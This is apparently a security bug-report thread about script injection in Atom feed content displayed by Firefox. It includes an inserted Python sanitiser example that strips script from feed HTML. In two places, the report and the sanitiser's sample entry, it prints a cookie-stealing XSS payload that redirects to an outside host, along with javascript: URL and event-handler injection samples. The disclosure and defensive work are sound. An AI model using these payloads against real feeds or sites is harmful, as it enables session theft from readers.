I'm sorry to be dense, but where is the vulnerability? What can this script do that ordinary script in a web page cannot? Does it run with chrome privileges or something?

> We tried emailing the security email address and received no responses so
> we're posting this here.

Which address, exactly?

Gerv
>> I'm sorry to be dense, but where is the vulnerability? What can this script
>> do that ordinary script in a web page cannot? Does it run with chrome
>> privileges or something?

As stated in the original posting, we've discovered multiple applications affected by script injection in a web-based feed, each having its own context limitations (some even allowing file system access). Regarding chrome privileges, this was not investigated, and other concerns/issues may or may not exist.

Let me address your question in two parts.

#1 Web feed content may originate from blog postings, other feeds, P2P websites, or news entries. Depending on the site containing the feed, an attacker may be able to steal cookies and send them to a third-party host.

    <script>document.location='http://host/cgi-bin/steal.cgi?'+document.cookie</script>

Firefox already strips out/disables script injection attempts in various locations within an Atom feed, however not within the 'div' tags.

In the example above you may be thinking 'why would someone try stealing cookies from themselves?'. Feeds may be created from other feeds, or from direct user input. An attacker may post a blog entry with script; the website itself filters the tag injection, however the feed portion of it doesn't. The same goes for feeds created from other feeds.

#2 Even with script execution disabled it is still possible to perform CSRF (http://en.wikipedia.org/wiki/CSRF) due to Atom's acceptance of HTML tags. There is no perfect solution regarding this 'ability'. A few suggestions:

* Disable HTML tag insertion: this unfortunately removes functionality
* Conversion of <>() tags to their HTML entities (again, this removes HTML formatting functionality)
* Creation of a new setting allowing the user to toggle between 'HTML and/or script on and off' on the feed renderer, and have this be turned 'off' by default.

>> We tried emailing the security email address and received no responses so
>> we're posting this here.
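The two mitigations listed in the post (entity-encoding the whole entry, or keeping HTML formatting while refusing script) can be shown side by side on a feed entry that carries the cookie-stealing payload inside its 'div' content. The following is an added example written for this page; it is not code from the original poster, from Firefox, or from any of the affected applications. The sample Atom entry body, the tag and attribute allow-lists, and the function names are all constructed for the illustration.

```python
"""Allow-list sanitiser for HTML carried in feed entries (added example).

A feed reader that renders <div>/<content type="html"> bodies as-is executes any
<script> the feed author, an upstream feed, or a blog commenter injected.  Two
options from the post are implemented: strip_script() keeps benign formatting
but drops script, event handlers and javascript: URLs; encode_everything()
entity-encodes the whole body (safe, but no formatting survives).
"""
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical allow-lists: tags a feed reader has a reason to render.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li",
                "blockquote", "code", "pre", "div", "span", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}  # no on*, no style
VOID_TAGS = {"br", "img"}
# Tags whose *content* must be discarded too, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}

# Constructed sample entry body (the kind of thing found inside <div> in Atom).
ENTRY_HTML = (
    '<div xmlns="http://www.w3.org/1999/xhtml">'
    "<p>Latest post</p>"
    "<script>document.location='http://host/cgi-bin/steal.cgi?'+document.cookie</script>"
    '<a href="http://example.org/post" onclick="alert(1)">read more</a>'
    '<img src="javascript:alert(document.cookie)" alt="x">'
    '<iframe src="http://example.org/x">hidden</iframe>'
    "</div>"
)


def safe_url(url):
    """Allow only http(s) or relative URLs; browsers ignore control chars and
    whitespace in the scheme, so strip them before deciding."""
    cleaned = "".join(ch for ch in url if ord(ch) > 0x20)
    head = re.split(r"[/?#]", cleaned, 1)[0]      # part before any path/query
    if ":" not in head:
        return True                               # relative URL, no scheme
    return head.split(":", 1)[0].lower() in ("http", "https")


class FeedSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # attr values arrive decoded
        self.out = []
        self._skip = 0        # >0 while inside a DROP_CONTENT tag
        self._open = []       # stack of emitted tags still open

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return            # unknown tag: drop it, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name in ("href", "src") and not safe_url(value):
                continue      # javascript:, data:, vbscript: ... are dropped
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag in VOID_TAGS or tag not in self._open:
            return
        while self._open:                         # tolerate mis-nesting
            t = self._open.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self._skip:                        # script/style bodies vanish
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self._open:                         # close whatever is left open
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def strip_script(fragment):
    """Option: keep formatting, refuse script."""
    p = FeedSanitizer()
    p.feed(fragment)
    return p.result()


def encode_everything(fragment):
    """Option: entity-encode the whole body; nothing is rendered as markup."""
    return escape(fragment, quote=True)


if __name__ == "__main__":
    print(strip_script(ENTRY_HTML))
    print(encode_everything(ENTRY_HTML))
```

Note what the allow-list version does and does not buy you: the script element, its body, the onclick handler and the javascript: image source are gone, but `img` is still permitted, so a feed can still make the reader's browser issue a GET to any http(s) URL with the reader's cookies attached. That is exactly the CSRF residue the post describes as having no perfect solution; a reader that wants to close it has to drop `img` (and `a`) from the allow-list or proxy their URLs, at which point the functionality loss approaches that of entity-encoding everything.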
> > Which address, exactly?

firstname.lastname@example.org

Please let us know if you have any additional questions.

email@example.com
In Firefox 1.5 these were treated as XML, and scripts are valid in XML. In Firefox 2 these are detected as feeds and no scripts are run.